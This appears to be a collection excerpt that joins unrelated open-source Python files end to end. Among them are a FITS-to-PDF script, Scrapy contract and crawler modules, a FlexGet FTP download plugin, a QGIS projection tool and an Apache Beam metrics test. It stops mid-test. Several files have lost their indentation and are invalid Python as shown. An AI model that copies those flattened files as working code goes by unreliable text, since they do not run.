# Copyright (c) Eric R. Jeschke. All rights reserved.
# This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
#
"""
$ ./fits2pdf.py <fitsfile> <output.pdf>
"""
import sys, os
import logging
from ginga.cairow.ImageViewCairo import ImageViewCairo
import cairo
from ginga import AstroImage
STD_FORMAT = '%(asctime)s | %(levelname)1.1s | %(filename)s:%(lineno)d (%(funcName)s) | %(message)s'
point_in = 1/72.0
point_cm = 0.0352777778
def main(options, args):
logger = logging.getLogger("example1")
logger.setLevel(logging.INFO)
fmt = logging.Formatter(STD_FORMAT)
stderrHdlr = logging.StreamHandler()
stderrHdlr.setFormatter(fmt)
logger.addHandler(stderrHdlr)
fi = ImageViewCairo(logger)
fi.configure(500, 1000)
# Load fits file
filepath = args[0]
image = AstroImage.AstroImage(logger=logger)
image.load_file(filepath)
# Make any adjustments to the image that we want
fi.set_bg(1.0, 1.0, 1.0)
fi.set_image(image)
fi.auto_levels()
fi.zoom_fit()
fi.center_image()
ht_pts = 11.0 / point_in
wd_pts = 8.5 / point_in
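    # 8.5 x 11 inch page -> 612 x 792 points (1 point = 1/72 inch)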
off_x, off_y = 0, 0
outfilepath = args[1]
out_f = open(outfilepath, 'w')
surface = cairo.PDFSurface(out_f, wd_pts, ht_pts)
# set pixels per inch
surface.set_fallback_resolution(300, 300)
surface.set_device_offset(off_x, off_y)
try:
fi.save_image_as_surface(surface)
surface.show_page()
surface.flush()
surface.finish()
finally:
out_f.close()
if __name__ == '__main__':
main(None, sys.argv[1:])
# END
| rajul/ginga | scripts/fits2pdf.py | Python | bsd-3-clause | 1,754 |
#!/usr/bin/env vpython3
# Copyright 2021 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
from blinkpy.web_tests.stale_expectation_removal import builders
from unexpected_passes_common import constants
from unexpected_passes_common import data_types
class BuilderRunsTestOfInterestUnittest(unittest.TestCase):
def setUp(self):
self.instance = builders.WebTestBuilders(False)
def testMatch(self):
"""Tests that a match can be successfully found."""
test_map = {
'isolated_scripts': [
{
'isolate_name': 'blink_web_tests',
},
],
}
self.assertTrue(
self.instance._BuilderRunsTestOfInterest(test_map, None))
# Re-add once WebGPU tests are supported.
# test_map = {
# 'isolated_scripts': [
# {
# 'isolate_name': 'webgpu_blink_web_tests',
# },
# ],
# }
# self.assertTrue(
# self.instance._BuilderRunsTestOfInterest(test_map, None))
def testNoMatch(self):
test_map = {
'isolated_scripts': [
{
'isolate_name': 'foo_web_tests',
},
],
}
self.assertFalse(
self.instance._BuilderRunsTestOfInterest(test_map, None))
class GetFakeCiBuildersUnittest(unittest.TestCase):
def testStringsConvertedToBuilderEntries(self):
"""Tests that the easier-to-read strings get converted to BuilderEntry."""
instance = builders.WebTestBuilders(False)
fake_builders = instance.GetFakeCiBuilders()
ci_builder = data_types.BuilderEntry('linux-blink-rel-dummy',
constants.BuilderTypes.CI, False)
expected_try = set([
data_types.BuilderEntry('linux-blink-rel',
constants.BuilderTypes.TRY, False),
data_types.BuilderEntry('v8_linux_blink_rel',
constants.BuilderTypes.TRY, False)
])
self.assertEqual(fake_builders[ci_builder], expected_try)
class GetNonChromiumBuildersUnittest(unittest.TestCase):
def testStringsConvertedToBuilderEntries(self):
"""Tests that the easier-to-read strings get converted to BuilderEntry."""
instance = builders.WebTestBuilders(False)
builder = data_types.BuilderEntry('ToTMacOfficial',
constants.BuilderTypes.CI, False)
self.assertIn(builder, instance.GetNonChromiumBuilders())
if __name__ == '__main__':
unittest.main(verbosity=2)
| chromium/chromium | third_party/blink/tools/blinkpy/web_tests/stale_expectation_removal/builders_unittest.py | Python | bsd-3-clause | 2,804 |
# Generated by Django 2.2.6 on 2019-11-05 16:01
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('scanners', '0013_auto_20191105_1522'),
]
operations = [
migrations.AlterField(
model_name='scannerrule',
name='action',
field=models.PositiveSmallIntegerField(choices=[(1, 'No action'), (20, 'Flag for human review'), (100, 'Delay auto-approval'), (200, 'Delay auto-approval indefinitely')], default=1),
),
]
| eviljeff/olympia | src/olympia/scanners/migrations/0014_alter_action_choices_on_scannerrule.py | Python | bsd-3-clause | 536 |
# Generic tests that all raw classes should run
from os import path as op
from numpy.testing import assert_allclose
from mne.datasets import testing
from mne.io import Raw
def _test_concat(reader, *args):
"""Test concatenation of raw classes that allow not preloading"""
data = None
for preload in (True, False):
raw1 = reader(*args, preload=preload)
raw2 = reader(*args, preload=preload)
raw1.append(raw2)
raw1.preload_data()
if data is None:
data = raw1[:, :][0]
assert_allclose(data, raw1[:, :][0])
for first_preload in (True, False):
raw = reader(*args, preload=first_preload)
data = raw[:, :][0]
for preloads in ((True, True), (True, False), (False, False)):
for last_preload in (True, False):
print(first_preload, preloads, last_preload)
raw1 = raw.crop(0, 0.4999)
if preloads[0]:
raw1.preload_data()
raw2 = raw.crop(0.5, None)
if preloads[1]:
raw2.preload_data()
raw1.append(raw2)
if last_preload:
raw1.preload_data()
assert_allclose(data, raw1[:, :][0])
@testing.requires_testing_data
def test_time_index():
"""Test indexing of raw times"""
raw_fname = op.join(op.dirname(__file__), '..', '..', 'io', 'tests',
'data', 'test_raw.fif')
raw = Raw(raw_fname)
# Test original (non-rounding) indexing behavior
orig_inds = raw.time_as_index(raw.times)
assert(len(set(orig_inds)) != len(orig_inds))
# Test new (rounding) indexing behavior
new_inds = raw.time_as_index(raw.times, use_rounding=True)
assert(len(set(new_inds)) == len(new_inds))
| trachelr/mne-python | mne/io/tests/test_raw.py | Python | bsd-3-clause | 1,809 |
import sys
import re
from functools import wraps
from unittest import TestCase
from scrapy.http import Request
from scrapy.utils.spider import iterate_spider_output
from scrapy.utils.python import get_spec
class ContractsManager(object):
contracts = {}
def __init__(self, contracts):
for contract in contracts:
self.contracts[contract.name] = contract
def extract_contracts(self, method):
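        # Scans the callback docstring for contract annotations, e.g.
        # (illustrative, using the default contracts):
        #     @url http://www.example.com/some/page
        #     @returns items 1 16
        #     @scrapes name price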
contracts = []
for line in method.__doc__.split('\n'):
line = line.strip()
if line.startswith('@'):
name, args = re.match(r'@(\w+)\s*(.*)', line).groups()
args = re.split(r'\s+', args)
contracts.append(self.contracts[name](method, *args))
return contracts
def from_method(self, method, results):
contracts = self.extract_contracts(method)
if contracts:
# calculate request args
args, kwargs = get_spec(Request.__init__)
kwargs['callback'] = method
for contract in contracts:
kwargs = contract.adjust_request_args(kwargs)
# create and prepare request
args.remove('self')
if set(args).issubset(set(kwargs)):
request = Request(**kwargs)
# execute pre and post hooks in order
for contract in reversed(contracts):
request = contract.add_pre_hook(request, results)
for contract in contracts:
request = contract.add_post_hook(request, results)
return request
class Contract(object):
""" Abstract class for contracts """
def __init__(self, method, *args):
self.testcase_pre = self.create_testcase(method, 'pre-hook')
self.testcase_post = self.create_testcase(method, 'post-hook')
self.args = args
def create_testcase(self, method, hook):
spider = method.__self__.name
class ContractTestCase(TestCase):
def __str__(_self):
return "[%s] %s (@%s %s)" % (spider, method.__name__, self.name, hook)
name = '%s_%s' % (spider, method.__name__)
setattr(ContractTestCase, name, lambda x: x)
return ContractTestCase(name)
def add_pre_hook(self, request, results):
if hasattr(self, 'pre_process'):
cb = request.callback
@wraps(cb)
def wrapper(response):
try:
results.startTest(self.testcase_pre)
self.pre_process(response)
results.stopTest(self.testcase_pre)
except AssertionError:
results.addFailure(self.testcase_pre, sys.exc_info())
except Exception:
results.addError(self.testcase_pre, sys.exc_info())
else:
results.addSuccess(self.testcase_pre)
finally:
return list(iterate_spider_output(cb(response)))
request.callback = wrapper
return request
def add_post_hook(self, request, results):
if hasattr(self, 'post_process'):
cb = request.callback
@wraps(cb)
def wrapper(response):
try:
output = list(iterate_spider_output(cb(response)))
results.startTest(self.testcase_post)
self.post_process(output)
results.stopTest(self.testcase_post)
except AssertionError:
results.addFailure(self.testcase_post, sys.exc_info())
except Exception:
results.addError(self.testcase_post, sys.exc_info())
else:
results.addSuccess(self.testcase_post)
finally:
return output
request.callback = wrapper
return request
def adjust_request_args(self, args):
return args
| 1900/scrapy | scrapy/contracts/__init__.py | Python | bsd-3-clause | 4,024 |
import six
import signal
import logging
import warnings
from twisted.internet import reactor, defer
from zope.interface.verify import verifyClass, DoesNotImplement
from scrapy.core.engine import ExecutionEngine
from scrapy.resolver import CachingThreadedResolver
from scrapy.interfaces import ISpiderLoader
from scrapy.extension import ExtensionManager
from scrapy.settings import Settings
from scrapy.signalmanager import SignalManager
from scrapy.exceptions import ScrapyDeprecationWarning
from scrapy.utils.ossignal import install_shutdown_handlers, signal_names
from scrapy.utils.misc import load_object
from scrapy.utils.log import LogCounterHandler, configure_logging, log_scrapy_info
from scrapy import signals
logger = logging.getLogger(__name__)
class Crawler(object):
def __init__(self, spidercls, settings=None):
if isinstance(settings, dict) or settings is None:
settings = Settings(settings)
self.spidercls = spidercls
self.settings = settings.copy()
self.spidercls.update_settings(self.settings)
self.signals = SignalManager(self)
self.stats = load_object(self.settings['STATS_CLASS'])(self)
handler = LogCounterHandler(self, level=settings.get('LOG_LEVEL'))
logging.root.addHandler(handler)
# lambda is assigned to Crawler attribute because this way it is not
# garbage collected after leaving __init__ scope
self.__remove_handler = lambda: logging.root.removeHandler(handler)
self.signals.connect(self.__remove_handler, signals.engine_stopped)
lf_cls = load_object(self.settings['LOG_FORMATTER'])
self.logformatter = lf_cls.from_crawler(self)
self.extensions = ExtensionManager.from_crawler(self)
self.settings.freeze()
self.crawling = False
self.spider = None
self.engine = None
@property
def spiders(self):
if not hasattr(self, '_spiders'):
warnings.warn("Crawler.spiders is deprecated, use "
"CrawlerRunner.spider_loader or instantiate "
"scrapy.spiderloader.SpiderLoader with your "
"settings.",
category=ScrapyDeprecationWarning, stacklevel=2)
self._spiders = _get_spider_loader(self.settings.frozencopy())
return self._spiders
@defer.inlineCallbacks
def crawl(self, *args, **kwargs):
assert not self.crawling, "Crawling already taking place"
self.crawling = True
try:
self.spider = self._create_spider(*args, **kwargs)
self.engine = self._create_engine()
start_requests = iter(self.spider.start_requests())
yield self.engine.open_spider(self.spider, start_requests)
yield defer.maybeDeferred(self.engine.start)
except Exception:
self.crawling = False
raise
def _create_spider(self, *args, **kwargs):
return self.spidercls.from_crawler(self, *args, **kwargs)
def _create_engine(self):
return ExecutionEngine(self, lambda _: self.stop())
@defer.inlineCallbacks
def stop(self):
if self.crawling:
self.crawling = False
yield defer.maybeDeferred(self.engine.stop)
class CrawlerRunner(object):
"""
    This is a convenient helper class that keeps track of, manages and runs
    crawlers inside an already set up Twisted `reactor`_.
The CrawlerRunner object must be instantiated with a
:class:`~scrapy.settings.Settings` object.
    This class shouldn't be needed (since Scrapy is responsible for using it
    accordingly) unless writing scripts that manually handle the crawling
    process. See :ref:`run-from-script` for an example.
"""
crawlers = property(
lambda self: self._crawlers,
doc="Set of :class:`crawlers <scrapy.crawler.Crawler>` started by "
":meth:`crawl` and managed by this class."
)
def __init__(self, settings=None):
if isinstance(settings, dict) or settings is None:
settings = Settings(settings)
self.settings = settings
self.spider_loader = _get_spider_loader(settings)
self._crawlers = set()
self._active = set()
@property
def spiders(self):
warnings.warn("CrawlerRunner.spiders attribute is renamed to "
"CrawlerRunner.spider_loader.",
category=ScrapyDeprecationWarning, stacklevel=2)
return self.spider_loader
def crawl(self, crawler_or_spidercls, *args, **kwargs):
"""
Run a crawler with the provided arguments.
It will call the given Crawler's :meth:`~Crawler.crawl` method, while
keeping track of it so it can be stopped later.
If `crawler_or_spidercls` isn't a :class:`~scrapy.crawler.Crawler`
instance, this method will try to create one using this parameter as
the spider class given to it.
Returns a deferred that is fired when the crawling is finished.
:param crawler_or_spidercls: already created crawler, or a spider class
or spider's name inside the project to create it
:type crawler_or_spidercls: :class:`~scrapy.crawler.Crawler` instance,
:class:`~scrapy.spiders.Spider` subclass or string
:param list args: arguments to initialize the spider
:param dict kwargs: keyword arguments to initialize the spider
"""
crawler = crawler_or_spidercls
if not isinstance(crawler_or_spidercls, Crawler):
crawler = self._create_crawler(crawler_or_spidercls)
self.crawlers.add(crawler)
d = crawler.crawl(*args, **kwargs)
self._active.add(d)
def _done(result):
self.crawlers.discard(crawler)
self._active.discard(d)
return result
return d.addBoth(_done)
def _create_crawler(self, spidercls):
if isinstance(spidercls, six.string_types):
spidercls = self.spider_loader.load(spidercls)
return Crawler(spidercls, self.settings)
def stop(self):
"""
        Simultaneously stops all the crawling jobs taking place.
Returns a deferred that is fired when they all have ended.
"""
return defer.DeferredList([c.stop() for c in list(self.crawlers)])
@defer.inlineCallbacks
def join(self):
"""
join()
Returns a deferred that is fired when all managed :attr:`crawlers` have
completed their executions.
"""
while self._active:
yield defer.DeferredList(self._active)
class CrawlerProcess(CrawlerRunner):
"""
A class to run multiple scrapy crawlers in a process simultaneously.
This class extends :class:`~scrapy.crawler.CrawlerRunner` by adding support
for starting a Twisted `reactor`_ and handling shutdown signals, like the
keyboard interrupt command Ctrl-C. It also configures top-level logging.
This utility should be a better fit than
:class:`~scrapy.crawler.CrawlerRunner` if you aren't running another
Twisted `reactor`_ within your application.
The CrawlerProcess object must be instantiated with a
:class:`~scrapy.settings.Settings` object.
    This class shouldn't be needed (since Scrapy is responsible for using it
    accordingly) unless writing scripts that manually handle the crawling
    process. See :ref:`run-from-script` for an example.
"""
def __init__(self, settings=None):
super(CrawlerProcess, self).__init__(settings)
install_shutdown_handlers(self._signal_shutdown)
configure_logging(self.settings)
log_scrapy_info(self.settings)
def _signal_shutdown(self, signum, _):
install_shutdown_handlers(self._signal_kill)
signame = signal_names[signum]
logger.info("Received %(signame)s, shutting down gracefully. Send again to force ",
{'signame': signame})
reactor.callFromThread(self._graceful_stop_reactor)
def _signal_kill(self, signum, _):
install_shutdown_handlers(signal.SIG_IGN)
signame = signal_names[signum]
logger.info('Received %(signame)s twice, forcing unclean shutdown',
{'signame': signame})
reactor.callFromThread(self._stop_reactor)
def start(self, stop_after_crawl=True):
"""
This method starts a Twisted `reactor`_, adjusts its pool size to
:setting:`REACTOR_THREADPOOL_MAXSIZE`, and installs a DNS cache based
on :setting:`DNSCACHE_ENABLED` and :setting:`DNSCACHE_SIZE`.
If `stop_after_crawl` is True, the reactor will be stopped after all
crawlers have finished, using :meth:`join`.
:param boolean stop_after_crawl: stop or not the reactor when all
crawlers have finished
"""
if stop_after_crawl:
d = self.join()
# Don't start the reactor if the deferreds are already fired
if d.called:
return
d.addBoth(self._stop_reactor)
reactor.installResolver(self._get_dns_resolver())
tp = reactor.getThreadPool()
tp.adjustPoolsize(maxthreads=self.settings.getint('REACTOR_THREADPOOL_MAXSIZE'))
reactor.addSystemEventTrigger('before', 'shutdown', self.stop)
reactor.run(installSignalHandlers=False) # blocking call
def _get_dns_resolver(self):
if self.settings.getbool('DNSCACHE_ENABLED'):
cache_size = self.settings.getint('DNSCACHE_SIZE')
else:
cache_size = 0
return CachingThreadedResolver(
reactor=reactor,
cache_size=cache_size,
timeout=self.settings.getfloat('DNS_TIMEOUT')
)
def _graceful_stop_reactor(self):
d = self.stop()
d.addBoth(self._stop_reactor)
return d
def _stop_reactor(self, _=None):
try:
reactor.stop()
except RuntimeError: # raised if already stopped or in shutdown stage
pass
def _get_spider_loader(settings):
""" Get SpiderLoader instance from settings """
if settings.get('SPIDER_MANAGER_CLASS'):
warnings.warn(
'SPIDER_MANAGER_CLASS option is deprecated. '
'Please use SPIDER_LOADER_CLASS.',
category=ScrapyDeprecationWarning, stacklevel=2
)
cls_path = settings.get('SPIDER_MANAGER_CLASS',
settings.get('SPIDER_LOADER_CLASS'))
loader_cls = load_object(cls_path)
try:
verifyClass(ISpiderLoader, loader_cls)
except DoesNotImplement:
warnings.warn(
'SPIDER_LOADER_CLASS (previously named SPIDER_MANAGER_CLASS) does '
'not fully implement scrapy.interfaces.ISpiderLoader interface. '
'Please add all missing methods to avoid unexpected runtime errors.',
category=ScrapyDeprecationWarning, stacklevel=2
)
return loader_cls.from_settings(settings.frozencopy())
| bdh1011/wau | venv/lib/python2.7/site-packages/scrapy/crawler.py | Python | mit | 11,081 |
# -*- coding: utf-8 -*-
from django.db import models, migrations
def migrate_requested_on(apps, schema_editor):
Changeset = apps.get_model("changeset", "Changeset")
for changeset in Changeset.objects.all():
if not changeset.requested_on:
changeset.requested_on = changeset.committed_on
changeset.save()
class Migration(migrations.Migration):
dependencies = [
('changeset', '0004_changeset_requested_on'),
]
operations = [
migrations.RunPython(migrate_requested_on),
] | tzhaoredhat/automation | pdc/apps/changeset/migrations/0005_changeset_requested_on_data_migration.py | Python | mit | 543 |
import logging
import os
import ftplib
from urlparse import urlparse
from flexget import plugin
from flexget.event import event
log = logging.getLogger('ftp')
class OutputFtp(object):
"""
Ftp Download plugin
input-url: ftp://<user>:<password>@<host>:<port>/<path to file>
Example: ftp://anonymous:[email protected]:21/torrent-files-dir
config:
ftp_download:
            use-ssl: False
            ftp_tmp_path: /tmp
            delete_origin: False
TODO:
- Resume downloads
- create banlists files
- validate connection parameters
"""
schema = {
'type': 'object',
'properties': {
'use-ssl': {'type': 'boolean', 'default': False},
'ftp_tmp_path': {'type': 'string', 'format': 'path'},
'delete_origin': {'type': 'boolean', 'default': False}
},
'additionalProperties': False
}
def prepare_config(self, config, task):
config.setdefault('use-ssl', False)
config.setdefault('delete_origin', False)
config.setdefault('ftp_tmp_path', os.path.join(task.manager.config_base, 'temp'))
return config
def ftp_connect(self, config, ftp_url, current_path):
if config['use-ssl']:
ftp = ftplib.FTP_TLS()
else:
ftp = ftplib.FTP()
log.debug("Connecting to " + ftp_url.hostname)
ftp.connect(ftp_url.hostname, ftp_url.port)
ftp.login(ftp_url.username, ftp_url.password)
ftp.sendcmd('TYPE I')
ftp.set_pasv(True)
ftp.cwd(current_path)
return ftp
def check_connection(self, ftp, config, ftp_url, current_path):
try:
ftp.voidcmd("NOOP")
        except Exception:
ftp = self.ftp_connect(config, ftp_url, current_path)
return ftp
def on_task_download(self, task, config):
config = self.prepare_config(config, task)
for entry in task.accepted:
ftp_url = urlparse(entry.get('url'))
current_path = os.path.dirname(ftp_url.path)
try:
ftp = self.ftp_connect(config, ftp_url, current_path)
            except Exception:
entry.failed("Unable to connect to server")
break
if not os.path.isdir(config['ftp_tmp_path']):
log.debug('creating base path: %s' % config['ftp_tmp_path'])
os.mkdir(config['ftp_tmp_path'])
file_name = os.path.basename(ftp_url.path)
try:
# Directory
ftp = self.check_connection(ftp, config, ftp_url, current_path)
ftp.cwd(file_name)
self.ftp_walk(ftp, os.path.join(config['ftp_tmp_path'], file_name), config, ftp_url, ftp_url.path)
ftp = self.check_connection(ftp, config, ftp_url, current_path)
ftp.cwd('..')
if config['delete_origin']:
ftp.rmd(file_name)
except ftplib.error_perm:
# File
self.ftp_down(ftp, file_name, config['ftp_tmp_path'], config, ftp_url, current_path)
ftp.close()
def on_task_output(self, task, config):
"""Count this as an output plugin."""
def ftp_walk(self, ftp, tmp_path, config, ftp_url, current_path):
log.debug("DIR->" + ftp.pwd())
log.debug("FTP tmp_path : " + tmp_path)
try:
ftp = self.check_connection(ftp, config, ftp_url, current_path)
dirs = ftp.nlst(ftp.pwd())
except ftplib.error_perm as ex:
log.info("Error %s" % ex)
return ftp
if not dirs:
return ftp
for file_name in (path for path in dirs if path not in ('.', '..')):
file_name = os.path.basename(file_name)
try:
ftp = self.check_connection(ftp, config, ftp_url, current_path)
ftp.cwd(file_name)
if not os.path.isdir(tmp_path):
os.mkdir(tmp_path)
log.debug("Directory %s created" % tmp_path)
ftp = self.ftp_walk(ftp,
os.path.join(tmp_path, os.path.basename(file_name)),
config,
ftp_url,
os.path.join(current_path, os.path.basename(file_name)))
ftp = self.check_connection(ftp, config, ftp_url, current_path)
ftp.cwd('..')
if config['delete_origin']:
ftp.rmd(os.path.basename(file_name))
except ftplib.error_perm:
ftp = self.ftp_down(ftp, os.path.basename(file_name), tmp_path, config, ftp_url, current_path)
ftp = self.check_connection(ftp, config, ftp_url, current_path)
return ftp
def ftp_down(self, ftp, file_name, tmp_path, config, ftp_url, current_path):
log.debug("Downloading %s into %s" % (file_name, tmp_path))
if not os.path.exists(tmp_path):
os.makedirs(tmp_path)
local_file = open(os.path.join(tmp_path, file_name), 'a+b')
ftp = self.check_connection(ftp, config, ftp_url, current_path)
try:
ftp.sendcmd("TYPE I")
file_size = ftp.size(file_name)
        except Exception:
            # SIZE not supported or it failed; assume a non-zero size so at
            # least one RETR attempt is made below
            file_size = 1
max_attempts = 5
log.info("Starting download of %s into %s" % (file_name, tmp_path))
while file_size > local_file.tell():
try:
if local_file.tell() != 0:
ftp = self.check_connection(ftp, config, ftp_url, current_path)
ftp.retrbinary('RETR %s' % file_name, local_file.write, local_file.tell())
else:
ftp = self.check_connection(ftp, config, ftp_url, current_path)
ftp.retrbinary('RETR %s' % file_name, local_file.write)
except Exception as error:
                if max_attempts != 0:
                    # consume one retry so the loop cannot spin forever on a persistent error
                    max_attempts -= 1
                    log.debug("Retrying download after error %s" % error)
else:
log.error("Too many errors downloading %s. Aborting." % file_name)
break
local_file.close()
if config['delete_origin']:
ftp = self.check_connection(ftp, config, ftp_url, current_path)
ftp.delete(file_name)
return ftp
@event('plugin.register')
def register_plugin():
plugin.register(OutputFtp, 'ftp_download', api_ver=2)
| thalamus/Flexget | flexget/plugins/output/ftp_download.py | Python | mit | 6,524 |
# -*- coding: utf-8 -*-
"""
***************************************************************************
extractprojection.py
---------------------
Date : September 2013
Copyright : (C) 2013 by Alexander Bruy
Email : alexander dot bruy at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Alexander Bruy'
__date__ = 'September 2013'
__copyright__ = '(C) 2013, Alexander Bruy'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import os
from qgis.PyQt.QtGui import QIcon
from osgeo import gdal, osr
from processing.algs.gdal.GdalAlgorithm import GdalAlgorithm
from processing.core.parameters import ParameterRaster
from processing.core.parameters import ParameterBoolean
pluginPath = os.path.split(os.path.split(os.path.dirname(__file__))[0])[0]
class ExtractProjection(GdalAlgorithm):
INPUT = 'INPUT'
PRJ_FILE = 'PRJ_FILE'
def __init__(self):
super().__init__()
def initAlgorithm(self, config=None):
self.addParameter(ParameterRaster(self.INPUT, self.tr('Input file')))
self.addParameter(ParameterBoolean(self.PRJ_FILE,
self.tr('Create also .prj file'), False))
def name(self):
return 'extractprojection'
def displayName(self):
return self.tr('Extract projection')
def icon(self):
return QIcon(os.path.join(pluginPath, 'images', 'gdaltools', 'projection-export.png'))
def group(self):
return self.tr('Raster projections')
def groupId(self):
return 'rasterprojections'
def getConsoleCommands(self, parameters, context, feedback, executing=True):
return ["extractprojection"]
def processAlgorithm(self, parameters, context, feedback):
rasterPath = self.getParameterValue(self.INPUT)
createPrj = self.getParameterValue(self.PRJ_FILE)
raster = gdal.Open(str(rasterPath))
crs = raster.GetProjection()
geotransform = raster.GetGeoTransform()
raster = None
outFileName = os.path.splitext(str(rasterPath))[0]
if crs != '' and createPrj:
tmp = osr.SpatialReference()
tmp.ImportFromWkt(crs)
tmp.MorphToESRI()
crs = tmp.ExportToWkt()
tmp = None
with open(outFileName + '.prj', 'wt') as prj:
prj.write(crs)
with open(outFileName + '.wld', 'wt') as wld:
wld.write('%0.8f\n' % geotransform[1])
wld.write('%0.8f\n' % geotransform[4])
wld.write('%0.8f\n' % geotransform[2])
wld.write('%0.8f\n' % geotransform[5])
wld.write('%0.8f\n' % (geotransform[0] +
0.5 * geotransform[1] +
0.5 * geotransform[2]))
wld.write('%0.8f\n' % (geotransform[3] +
0.5 * geotransform[4] +
0.5 * geotransform[5]))
| CS-SI/QGIS | python/plugins/processing/algs/gdal/extractprojection.py | Python | gpl-2.0 | 3,629 |
# -*- coding: utf-8 -*-
from ..internal.OCR import OCR
class GigasizeCom(OCR):
__name__ = "GigasizeCom"
__type__ = "ocr"
__version__ = "0.17"
__status__ = "testing"
__description__ = """Gigasize.com ocr plugin"""
__license__ = "GPLv3"
__authors__ = [("pyLoad Team", "[email protected]")]
def recognize(self, image):
self.load_image(image)
self.threshold(2.8)
self.run_tesser(True, False, False, True)
return self.result_captcha
| Arno-Nymous/pyload | module/plugins/captcha/GigasizeCom.py | Python | gpl-3.0 | 496 |
# https://djangosnippets.org/snippets/2533/
import inspect
from django.utils.html import strip_tags
from django.utils.encoding import force_unicode
def process_docstring(app, what, name, obj, options, lines):
# This causes import errors if left outside the function
from django.db import models
# Only look at objects that inherit from Django's base model class
if inspect.isclass(obj) and issubclass(obj, models.Model):
# Grab the field list from the meta class
fields = obj._meta.fields
for field in fields:
# Decode and strip any html out of the field's help text
help_text = strip_tags(force_unicode(field.help_text))
# Decode and capitalize the verbose name, for use if there isn't
# any help text
verbose_name = force_unicode(field.verbose_name).capitalize()
if help_text:
# Add the model field to the end of the docstring as a param
# using the help text as the description
lines.append(u':param %s: %s' % (field.attname, help_text))
else:
# Add the model field to the end of the docstring as a param
# using the verbose name as the description
lines.append(u':param %s: %s' % (field.attname, verbose_name))
# Add the field's type to the docstring
if isinstance(field, models.ForeignKey):
to = field.rel.to
lines.append(u':type %s: %s to :class:`~%s.%s`' % (field.attname, type(field).__name__, to.__module__, to.__name__))
else:
lines.append(u':type %s: %s' % (field.attname, type(field).__name__))
# Return the extended docstring
return lines
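# Illustrative note (not part of the original snippet): this hook is meant to
# be registered from a Sphinx conf.py, e.g.
#
#     def setup(app):
#         app.connect('autodoc-process-docstring', process_docstring)
#
# so that model fields show up as :param:/:type: entries in the generated docs.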
| waseem18/oh-mainline | vendor/packages/django-http-proxy/docs/_ext/django_models.py | Python | agpl-3.0 | 1,773 |
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
import unittest
import hamcrest as hc
from apache_beam.metrics.cells import DistributionData
from apache_beam.metrics.cells import DistributionResult
from apache_beam.metrics.execution import MetricKey
from apache_beam.metrics.execution import MetricResult
from apache_beam.metrics.execution import MetricUpdates
from apache_beam.metrics.metricbase import MetricName
from apache_beam.runners.direct.direct_metrics import DirectMetrics
class DirectMetricsTest(unittest.TestCase):
name1 = MetricName('namespace1', 'name1')
name2 = MetricName('namespace1', 'name2')
name3 = MetricName('namespace2', 'name1')
bundle1 = object() # For this test, any object can be a bundle
bundle2 = object()
def test_combiner_functions(self):
metrics = DirectMetrics()
counter = metrics._counters['anykey']
counter.commit_logical(self.bundle1, 5)
self.assertEqual(counter.extract_committed(), 5)
with self.assertRaises(TypeError):
counter.commit_logical(self.bundle1, None)
distribution = metrics._distributions['anykey']
distribution.commit_logical(self.bundle1, DistributionData(4, 1, 4, 4))
self.assertEqual(distribution.extract_committed(),
DistributionResult(DistributionData(4, 1, 4, 4)))
with self.assertRaises(AttributeError):
distribution.commit_logical(self.bundle1, None)
def test_commit_logical_no_filter(self):
metrics = DirectMetrics()
metrics.commit_logical(
self.bundle1,
MetricUpdates(
counters={MetricKey('step1', self.name1): 5,
MetricKey('step1', self.name2): 8},
distributions={
MetricKey('step1', self.name1): DistributionData(8, 2, 3, 5)}))
metrics.commit_logical(
self.bundle1,
MetricUpdates(
counters={MetricKey('step2', self.name1): 7,
MetricKey('step1', self.name2): 4},
distributions={
MetricKey('step1', self.name1): DistributionData(4, 1, 4, 4)}))
results = metrics.query()
hc.assert_that(
results['counters'],
hc.contains_inanyorder(*[
MetricResult(MetricKey('step1', self.name2), 12, 0),
MetricResult(MetricKey('step2', self.name1), 7, 0),
MetricResult(MetricKey('step1', self.name1), 5, 0)]))
hc.assert_that(
results['distributions'],
hc.contains_inanyorder(
MetricResult(MetricKey('step1', self.name1),
DistributionResult(
DistributionData(12, 3, 3, 5)),
DistributionResult(
DistributionData(0, 0, None, None)))))
def test_apply_physical_no_filter(self):
metrics = DirectMetrics()
metrics.update_physical(object(),
MetricUpdates(
counters={MetricKey('step1', self.name1): 5,
MetricKey('step1', self.name3): 8}))
metrics.update_physical(object(),
MetricUpdates(
counters={MetricKey('step2', self.name1): 7,
MetricKey('step1', self.name3): 4}))
results = metrics.query()
hc.assert_that(results['counters'],
hc.contains_inanyorder(*[
MetricResult(MetricKey('step1', self.name1), 0, 5),
MetricResult(MetricKey('step1', self.name3), 0, 12),
MetricResult(MetricKey('step2', self.name1), 0, 7)]))
metrics.commit_physical(object(), MetricUpdates())
results = metrics.query()
hc.assert_that(results['counters'],
hc.contains_inanyorder(*[
MetricResult(MetricKey('step1', self.name1), 0, 5),
MetricResult(MetricKey('step1', self.name3), 0, 12),
MetricResult(MetricKey('step2', self.name1), 0, 7)]))
def test_apply_physical_logical(self):
metrics = DirectMetrics()
dist_zero = DistributionData(0, 0, None, None)
metrics.update_physical(
object(),
MetricUpdates(
counters={MetricKey('step1', self.name1): 7,
MetricKey('step1', self.name2): 5,
MetricKey('step2', self.name1): 1},
distributions={MetricKey('step1', self.name1):
DistributionData(3, 1, 3, 3),
MetricKey('step2', self.name3):
DistributionData(8, 2, 4, 4)}))
results = metrics.query()
hc.assert_that(results['counters'],
hc.contains_inanyorder(*[
MetricResult(MetricKey('step1', self.name1), 0, 7),
